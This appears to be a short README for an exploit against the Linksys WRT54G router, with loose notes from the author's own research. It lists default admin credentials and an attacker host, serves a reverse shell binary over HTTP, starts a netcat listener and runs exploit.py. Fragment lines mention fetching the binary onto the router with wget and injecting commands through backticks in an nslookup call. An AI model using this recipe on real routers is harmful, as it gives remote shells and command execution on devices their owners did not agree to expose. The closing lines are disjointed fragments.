Exploiting Linksys WRT54G using a vulnerability I found.
# Install the requirements.
pip install -r requirements.txt
ROUTER_HOST=192.169.1.1
ROUTER_USERNAME=admin
ROUTER_PASSWORD=admin
ATTACKER_HOST=192.169.1.100
ATTACKER_HTTP_SERVER_PORT=8000
ATTACKER_REVSHELL_HANDLER_PORT=4141
# Start HTTP server in order to serve the reverse shell executable.
cd revshell
python -m SimpleHTTPServer $ATTACKER_HTTP_SERVER_PORT
# Start reverse shell handler.
nc -l $ATTACKER_REVSHELL_HANDLER_PORT
# Run the exploit.
python exploit.py --host $ROUTER_HOST --username $ROUTER_USERNAME --password $ROUTER_PASSWORD --attacker-host $ATTACKER_HOST --attacker-http-port $ATTACKER_HTTP_SERVER_PORT --attacker-handler-port $ATTACKER_REVSHELL_HANDLER_PORT
/tmp/ping.log to view the output at /Ping.asp.
wget to download reverse shell binary to the router.
nslookup `whoami`.fake.domain
ui_language is stored in nvram (Non-Volatile Memory), how come it fixes itself upon reboot?